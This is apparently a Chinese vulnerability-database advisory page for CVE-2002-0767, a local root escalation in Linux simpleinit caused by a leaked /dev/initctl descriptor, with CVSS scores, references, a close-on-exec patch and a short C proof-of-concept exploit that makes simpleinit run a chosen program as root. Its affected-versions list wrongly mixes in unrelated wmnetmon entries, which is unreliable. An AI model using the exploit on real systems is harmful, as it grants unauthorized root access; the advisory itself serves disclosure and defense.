CVE-2002-0767
CVSS7.2
发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-05 16:28:53
NMCOES    

[原文]simpleinit on Linux systems does not close a read/write FIFO file descriptor before creating a child process, which allows the child process to cause simpleinit to execute arbitrary programs with root privileges.


[CNNVD]Richard Gooch SimpleInit 开放文件描述符漏洞(CNNVD-200208-088)

        Linux系统的simpleinit在创建子进程时不能关闭读/写FIFO文件描述符。子进程可以利用该漏洞导致simpleinit执行拥有根目录特权的任意程序。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0767
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0767
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-088
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5001
(VENDOR_ADVISORY)  BID  5001
http://www.iss.net/security_center/static/9357.php
(VENDOR_ADVISORY)  XF  simpleinit-file-descriptor-open(9357)
http://online.securityfocus.com/archive/1/276739
(VENDOR_ADVISORY)  BUGTRAQ  20020613 simpleinit root exploit - file descriptor left open

- 漏洞信息

Richard Gooch SimpleInit 开放文件描述符漏洞
高危 设计错误
2002-08-12 00:00:00 2005-10-20 00:00:00
本地  
        Linux系统的simpleinit在创建子进程时不能关闭读/写FIFO文件描述符。子进程可以利用该漏洞导致simpleinit执行拥有根目录特权的任意程序。

- 公告与补丁

        An unofficial patch has been provided by Patrick Smith :
        --- login-utils/simpleinit.c.orig 2001-09-29 11:09:10.000000000 -0400
        +++ login-utils/simpleinit.c 2002-05-23 22:16:07.000000000 -0400
        @@ -203,6 +203,18 @@
         if ( ( initctl_fd = open (initctl_name, O_RDWR, 0) ) < 0 )
         err ( _("error opening fifo\n") );
         }
        + if ( initctl_fd >= 0 )
        + if ( fcntl (initctl_fd, F_SETFD, FD_CLOEXEC) != 0 ) {
        + err ( _("error setting close-on-exec on /dev/initctl") );
        + /* Can the fcntl ever fail? If it does, and we leave
        + the descriptor open in child processes, then any
        + process on the system will be able to write to
        + /dev/initctl and have us execute arbitrary commands
        + as root. So let's refuse to use the fifo in this
        + case. */
        + close(initctl_fd);
        + initctl_fd = -1;
        + }
        if ( want_single || (access (_PATH_SINGLE, R_OK) == 0) ) do_single ();
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21538)

Richard Gooch SimpleInit 2.0.2 Open File Descriptor Vulnerability (EDBID:21538)
linux local
2002-06-12 Verified
0 Patrick Smith
N/A [点击下载]
source: http://www.securityfocus.com/bid/5001/info

A vulnerability has been reported for simpleinit that may allow users to execute arbitrary commands as the superuser.

The vulnerability occurs because simpleinit may allow some child processes to inherit a file descriptor with read-write access. The file descriptor is used to access /dev/initctl and this descriptor is normally used by 'initctl', 'need' and 'provide' programs to pass instructions to simpleinit. The simpleinit process runs with root privileges.

A local user whose process inherits this file descriptor will be able to cause simpleinit to execute commands as the superuser.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include "simpleinit.h"  /* From the util-linux source */

int main()
{
   int fd = 3;
   char buf[COMMAND_SIZE];
   struct command_struct* cmd = (struct command_struct*) buf;

   memset(buf, '\0', sizeof(buf));
   cmd->command = COMMAND_NEED;
   cmd->pid = 17;
   cmd->ppid = 16;
   strcpy(cmd->name, "/home/pat/x/foo");  /* foo will be run as root */
   write(fd, buf, COMMAND_SIZE);
   return 0;
}
		

- 漏洞信息

14437
simpleinit File Descriptor Child Process Arbitrary Command Execution

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-06-13 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Richard Gooch SimpleInit Open File Descriptor Vulnerability
Design Error 5001
No Yes
2002-06-12 12:00:00 2009-07-11 01:56:00
Credited to Patrick Smith <patsmith@pobox.com>.

- 受影响的程序版本

Richard Gooch simpleinit 2.0.2
+ util-linux util-linux 2.11 r
Alvaro Lopes wmnetmon 0.2 p4-gnomepanelsupport
Alvaro Lopes wmnetmon 0.2 p3
Alvaro Lopes wmnetmon 0.2 p2
Alvaro Lopes wmnetmon 0.2 p1
Alvaro Lopes wmnetmon 0.2
Alvaro Lopes wmnetmon 0.2 p5

- 不受影响的程序版本

Alvaro Lopes wmnetmon 0.2 p5

- 漏洞讨论

A vulnerability has been reported for simpleinit that may allow users to execute arbitrary commands as the superuser.

The vulnerability occurs because simpleinit may allow some child processes to inherit a file descriptor with read-write access. The file descriptor is used to access /dev/initctl and this descriptor is normally used by 'initctl', 'need' and 'provide' programs to pass instructions to simpleinit. The simpleinit process runs with root privileges.

A local user whose process inherits this file descriptor will be able to cause simpleinit to execute commands as the superuser.

- 漏洞利用

The following exploit has been provided by Patrick Smith &lt;patsmith@pobox.com&gt;:

- 解决方案

An unofficial patch has been provided by Patrick Smith <patsmith@pobox.com>:

--- login-utils/simpleinit.c.orig 2001-09-29 11:09:10.000000000 -0400
+++ login-utils/simpleinit.c 2002-05-23 22:16:07.000000000 -0400
@@ -203,6 +203,18 @@
if ( ( initctl_fd = open (initctl_name, O_RDWR, 0) ) < 0 )
err ( _("error opening fifo\n") );
}
+ if ( initctl_fd >= 0 )
+ if ( fcntl (initctl_fd, F_SETFD, FD_CLOEXEC) != 0 ) {
+ err ( _("error setting close-on-exec on /dev/initctl") );
+ /* Can the fcntl ever fail? If it does, and we leave
+ the descriptor open in child processes, then any
+ process on the system will be able to write to
+ /dev/initctl and have us execute arbitrary commands
+ as root. So let's refuse to use the fifo in this
+ case. */
+ close(initctl_fd);
+ initctl_fd = -1;
+ }

if ( want_single || (access (_PATH_SINGLE, R_OK) == 0) ) do_single ();

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


Alvaro Lopes wmnetmon 0.2 p1

Alvaro Lopes wmnetmon 0.2 p2

Alvaro Lopes wmnetmon 0.2 p3

Alvaro Lopes wmnetmon 0.2 p4-gnomepanelsupport

Alvaro Lopes wmnetmon 0.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站